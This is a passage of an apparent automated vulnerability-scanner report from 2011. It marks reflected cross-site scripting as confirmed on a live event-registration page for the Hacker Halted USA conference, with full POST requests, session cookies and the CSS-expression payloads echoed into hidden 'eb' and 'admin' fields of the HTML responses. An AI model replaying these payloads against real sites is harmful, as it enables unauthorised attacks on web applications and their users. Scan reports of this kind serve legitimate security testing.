type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST " stYle="x:expre/**/ssion(alert(9))
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1515f5f3833e46c8a86d83f083147daa
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=tgahj6os8mkpk5rttlqcvbhqm4
Content-Length: 1550
Accept-Encoding: gzip, deflate

--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="action"

preload_category
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="eventid"

19301
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="categoryid"

-1
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="language"

eng
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="reference"

3
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="eb"

" stYle="x:expre/**/ssion(netsparker(9))
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="admin"

-1
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="bridgeid"

3
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="discountcode"

3
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="catpassword[65419]"

3
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="catpassword[65420]"

3
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="catpassword[65413]"

3
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="catpassword[65411]"

3
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="catpassword[65421]"

3
--1515f5f3833e46c8a86d83f083147daa
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--1515f5f3833e46c8a86d83f083147daa--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:51:34 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3410
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST " stYle="x:expre/**/ssion(alert(9))
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=9147a61263af48948979d9436ba0122a
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=tgahj6os8mkpk5rttlqcvbhqm4
Content-Length: 1549
Accept-Encoding: gzip, deflate

--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="action"

preload_category
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="eventid"

19301
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="categoryid"

-1
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="language"

eng
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="reference"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="eb"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="admin"

" stYle="x:expre/**/ssion(netsparker(9))
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="bridgeid"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="discountcode"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="catpassword[65419]"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="catpassword[65420]"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="catpassword[65413]"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="catpassword[65411]"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="catpassword[65421]"

3
--9147a61263af48948979d9436ba0122a
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--9147a61263af48948979d9436ba0122a--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:51:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3409
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
